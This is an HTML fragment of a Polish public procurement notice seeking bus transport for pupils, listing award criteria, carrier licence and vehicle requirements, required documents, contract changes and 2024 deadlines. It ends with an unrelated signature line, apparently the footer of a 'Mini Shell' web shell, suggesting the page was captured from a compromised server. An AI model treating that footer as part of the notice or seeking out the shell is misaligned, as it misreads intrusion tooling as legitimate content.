class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">17.3. Kryterium – czas podstawienia autobusu zastępczego – TP (liczone w minutach):</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>postępowaniu<br/>6.1.1. zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>6.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów;<br/>7. Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Warunek zostanie spełniony jeśli wykonawca wykaże że posiada zezwolenie na wykonanie zawodu przewoźnika<br/>drogowego zgodnie z art. 5 ust. 1 ustawy o transporcie drogowym (Dz. U. z 2022r. poz. 180) lub ważna licencję na<br/>wykonanie krajowego transportu drogowego osób wydana na podstawie wcześniej obowiązujących przepisów .<br/>6.1.3 sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa warunku w ww. zakresie<br/>6.1.4 zdolności technicznej lub zawodowej w zakresie:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania<br/>zamówienia i skierują do jego realizacji:<br/>Minimum trzy autobusy/busy sprawne techniczne i dopuszczone do ruchu z odpowiednia liczbą miejsc umożliwiających<br/>dowóz wszystkich uczniów na poszczególnych trasach w wyznaczonych godzinach.<br/>Każdy pojazd musi spełniać następujące wymagania:<br/>- tabor samochodowy nie starszy niż 2005r.,<br/>- dopuszczony do przewozu osób,<br/>- posiadać ważne badania diagnostyczne, aktualne ubezpieczenie OC,<br/>- być wyposażony w pasy bezpieczeństwa zgodnie z wyposażeniem fabrycznym bądź homologacja pojazdu,<br/>- spełniać odpowiednie warunki bhp i warunki higieniczne.<br/>6.2. Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym etapie postępowania, uznać, że<br/>Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze<br/>Wykonawcy może mieć negatywny wpływ na realizację zamówienia na każdym etapie postępowania (art. 116 ust. 2 ustawy<br/>Pzp).<br/>6.3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w postępowaniu mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane.<br/>6.4. Sposób wykazania warunków udziału w postępowaniu wskazano w rozdziale 8 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga<br/>podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.3.1. W<br/>celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) - zezwolenie na wykonanie zawodu przewoźnika drogowego zgodnie z art. 5 ust. 1 ustawy o transporcie drogowym (Dz. U. z<br/>2022r. poz. 180) lub ważna licencję na wykonanie krajowego transportu drogowego osób wydana na podstawie wcześniej<br/>obowiązujących przepisów w odniesieniu do warunku określonego w pkt. 6.1.2. ppkt. 2) SWZ.<br/>b) wykazu sprzętu, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, sporządzonego zgodnie z Załącznikiem<br/>Nr 6 do SWZ - w odniesieniu do warunku określonego w pkt. 6.1.4. ppkt. 2) SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 8.3.1. W<br/>celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) - zezwolenie na wykonanie zawodu przewoźnika drogowego zgodnie z art. 5 ust. 1 ustawy o transporcie drogowym (Dz. U. z<br/>2022r. poz. 180) lub ważna licencję na wykonanie krajowego transportu drogowego osób wydana na podstawie wcześniej<br/>obowiązujących przepisów w odniesieniu do warunku określonego w pkt. 6.1.2. ppkt. 2) SWZ.<br/>b) wykazu sprzętu, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, sporządzonego zgodnie z Załącznikiem<br/>Nr 6 do SWZ - w odniesieniu do warunku określonego w pkt. 6.1.4. ppkt. 2) SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 13.4. Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1) Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 3 do SWZ (przy czym Wykonawca może<br/>sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i załącznikach).<br/>2) Oświadczenia, o których mowa w pkt 8.1 SWZ;<br/>3) Oświadczenie, o którym mowa w pkt 8.2 SWZ (jeżeli dotyczy),<br/>4) Zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4 SWZ (jeżeli dotyczy).<br/>5) Potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu udostępniającego zasoby:<br/>a) Zamawiający w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu udostępniającego zasoby<br/>jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji I Informacji o Działalności Gospodarczej lub innego właściwego rejestru; b) Wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a),<br/>jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał<br/>dane umożliwiające dostęp do tych dokumentów.<br/>c) jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów,<br/>o których mowa w lit a), Zamawiający żąda od Wykonawcy lub podmiotu udostępniającego zasoby złożenia wraz z ofertą<br/>pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy.<br/>6) Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego (jeżeli dotyczy).<br/>7) Formularz cenowy – zał. nr 1a oferty Wykonawcy – przedstawiający sposób wyliczenia ceny oferty i przedstawia ceny<br/>jednostkowe biletów na poszczególnych trasach.<br/>Załącznik Nr 1a do SWZ stanowią integralny element oferty i nie podlegają uzupełnieniu na zasadach określonych w<br/>przepisach art. 128 ust. 1 ustawy Pzp. Brak wskazania tych danych może stanowić podstawę odrzucenia oferty z<br/>zastrzeżeniem przepisów art. 223 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>10.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia<br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału<br/>w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) w przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie,<br/>z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. W przypadku gdy ofertę<br/>składa spółka cywilna, a pełen zakres prac wykonają wspólnicy wspólnie w ramach umowy spółki oświadczenie powinno<br/>potwierdzać ten fakt. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ,<br/>przy czym podmiotowe środki dowodowe, o których mowa w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy,<br/>który/którzy wykazuje/-ą spełnienie warunku.<br/>10.3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, o których mowa w art. 454 i 455 ustawy – Prawo zamówień publicznych i innych przypadków<br/>wskazanych w niniejszej umowie, Zamawiający dopuszcza możliwość wprowadzania zmiany umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru Wykonawcy, w sytuacji wystąpienia poniższych przypadków:<br/>1) zmiana osób skierowanych do wykonywania zamówienia ze strony Wykonawcy, z zastrzeżeniem, że nowa osoba , która<br/>będzie wykonywała przedmiot umowy musi wykazać, że posiada uprawnienia zawodowe do wykonywania powierzonych jej<br/>czynności zgodnie z obowiązującymi przepisami prawa, wymagane przez zamawiającego w procedurze o udzielenie<br/>zamówienia publicznego będącego przedmiotem umowy,<br/>2) zmiana pojazdów skierowanych do realizacji zamówienia, z zastrzeżeniem, że nowy pojazd musi spełniać warunki<br/>określone przez zamawiającego w procedurze o udzielenie zamówienia publicznego będącego przedmiotem umowy.<br/>2. Dopuszcza się zmiany wysokości wynagrodzenia Wykonawcy, w razie zmiany stawek podatku od towarów i usług.<br/>3. Zmiany umowy mogą być dokonywane wyłącznie w formie pisemnej pod rygorem nieważności.<br/>4. Zmiana osobowa listy dowożonych dzieci oraz zmiana harmonogramu dziennego dowożenia dzieci w formie pisemnego<br/>powiadomienia bez potrzeby sporządzenia aneksu do umowy. 5. Zmiana pojazdów wykorzystywanych do świadczenia usług oraz zmiana wykazu osób zatrudnionych przez Wykonawcę<br/>do realizacji zadania następuje w formie pisemnego powiadomienia bez potrzeby sporządzenia aneksu do umowy – po<br/>spełnieniu warunków określonych w procedurze o udzielenie zamówienia publicznego i po wyrażeniu zgody przez<br/>zamawiającego.<br/>6. Wykonawca jest zobowiązany w terminie 7 dni do pisemnego zawiadomienia zamawiającego o zmianie danych<br/>zawartych w umowie; zmianie siedziby lub nazwy firmy Wykonawcy; zmianie osób reprezentujących Wykonawcę;<br/>ogłoszenie upadłości Wykonawcy; likwidacji firmy Wykonawcy.<br/>7. W przypadku niepowiadomienia przez Wykonawcę Zamawiającego o zmianie danych zawartych w umowie, wszelką<br/>korespondencję wysłana przez zamawiającego zgodnie z posiadanymi przez niego danymi Strony uznaje się za doręczoną. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://telatyn.ezamawijacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-22 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane art. 7 ustawy z dnia 13 kwietnia<br/>2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (t. j. Dz. U. 2023 r., poz. 1497 z późn. zm.).<br/>Ogłoszenie nr 2024/BZP 00402707/01 z dnia 2024-07-09<br/>2024-

Creat By MiNi SheLL
Email: jattceo@gmail.com